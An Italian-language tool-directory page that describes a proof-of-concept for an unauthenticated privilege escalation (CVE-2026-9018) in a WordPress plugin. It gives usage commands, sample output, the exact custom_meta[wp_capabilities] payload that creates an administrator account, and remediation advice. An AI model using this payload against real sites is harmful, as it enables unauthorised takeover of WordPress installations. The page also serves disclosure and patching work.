Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-9018 — Escalation dei privilegi non autenticata CVE-2026-9018: Easy Elements for Elementor | Kitploit
Strumenti/GitHubGitHub/xxconi/cve-2026-9018
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubxxconi/cve-2026-9018

CVE-2026-9018

Escalation dei privilegi non autenticata CVE-2026-9018: Easy Elements for Elementor

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | Escalation dei privilegi non autenticata

CVE CVSS CWE Auth Python

Ricerca di: Atomic Edge Gravità: Alta | CVSS: 8.8 | Autenticazione richiesta: Nessuna


Panoramica

Esiste una vulnerabilità di escalation dei privilegi non autenticata nel plugin WordPress Easy Elements for Elementor – Addons & Website Templates (versioni ≤ 1.4.5). La funzione easyel_handle_register(), esposta tramite il gestore AJAX wp_ajax_nopriv_eel_register, passa i valori POST custom_meta controllati dall'attaccante direttamente a update_user_meta() senza alcuna whitelist di chiavi. Ciò consente a un attaccante non autenticato di sovrascrivere la chiave meta wp_capabilities e creare un account di livello amministratore.


Prerequisiti

Prima dello sfruttamento, sul sito target devono essere soddisfatte le seguenti condizioni:

  • ✅ In WordPress la registrazione utenti è abilitata (Impostazioni → Generali → Chiunque può registrarsi)
  • ✅ Una pagina con il widget Login/Registrazione del plugin è accessibile pubblicamente
  • ✅ Il widget espone il valore easy_elements_nonce nel DOM della pagina.

Requisiti

root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
# Basic — nonce fetched from homepage
python3 poc.py -u https://target.com

# Custom credentials
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/

# Skip SSL verification
python3 poc.py -u https://target.com --no-verify

# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login

Argomenti

Esempio di output

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

Dettagli tecnici

L'exploit segue un processo in due fasi:

Step 1 — Raccolta del nonce Il widget Login/Registrazione di Elementor del plugin renderizza un campo nascosto easy_elements_nonce nell'HTML della pagina. Questo nonce è accessibile pubblicamente a qualsiasi visitatore non autenticato e viene estratto tramite regex dal sorgente della pagina.

Step 2 — Registrazione malevola Viene inviata una richiesta POST a /wp-admin/admin-ajax.php con action=eel_register. L'array custom_meta viene costruito per includere:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

Poiché easyel_handle_register() passa tutte le chiavi custom_meta direttamente a update_user_meta() senza una whitelist, il meta utente wp_capabilities viene sovrascritto dopo la registrazione, concedendo al nuovo utente pieni privilegi di amministratore.


Rimedio

Gli sviluppatori devono applicare le seguenti correzioni a easyel_handle_register():

  1. Implementare una whitelist rigorosa delle chiavi custom_meta consentite (es. first_name, last_name, phone)
  2. Bloccare esplicitamente le chiavi sensibili: wp_capabilities, wp_user_level, session_tokens
  3. Evitare di elaborare qualsiasi meta fornito dall'utente dopo wp_insert_user() se non necessario
  4. La sola sanitizzazione degli input è insufficiente — una whitelist è obbligatoria

→ Aggiornare immediatamente a Easy Elements for Elementor 1.4.6 o successivo.


Esclusione di responsabilità

Questo repository è destinato esclusivamente a ricerca sulla sicurezza autorizzata e scopi educativi. Non utilizzare questo strumento contro alcun sistema senza esplicita autorizzazione scritta del proprietario del sistema. L'uso non autorizzato può violare il CFAA (USA), il Codice penale s.342.1 (Canada), la Direttiva UE NIS2 e altre leggi applicabili. Gli autori non si assumono alcuna responsabilità per usi impropri o danni derivanti da questo codice.

Scarica lo strumento
ProprietàDettaglio
PluginEasy Elements for Elementor – Addons & Website Templates (easy-elements)
Versioni interessate≤ 1.4.5
Corretta in1.4.6+
VettoreRete / Non autenticato
CWECWE-269: Gestione impropria dei privilegi
Azione AJAXeel_register (nopriv)
FlagDescrizionePredefinito
-u, --urlURL WordPress di destinazione(obbligatorio)
-U, --usernameNome utente per il nuovo account amministratoreatomic_admin
-e, --emailEmail per il nuovo account amministratore[email protected]
-p, --passwordPassword per il nuovo account amministratoreAtomic@Edge2026!
-np, --nonce-pagePercorso della pagina contenente il widget Login/Registrazione/
--no-verifyDisabilita la verifica del certificato SSLfalse
--skip-verify-loginSalta la verifica di login dell'admin WP post-exploitfalse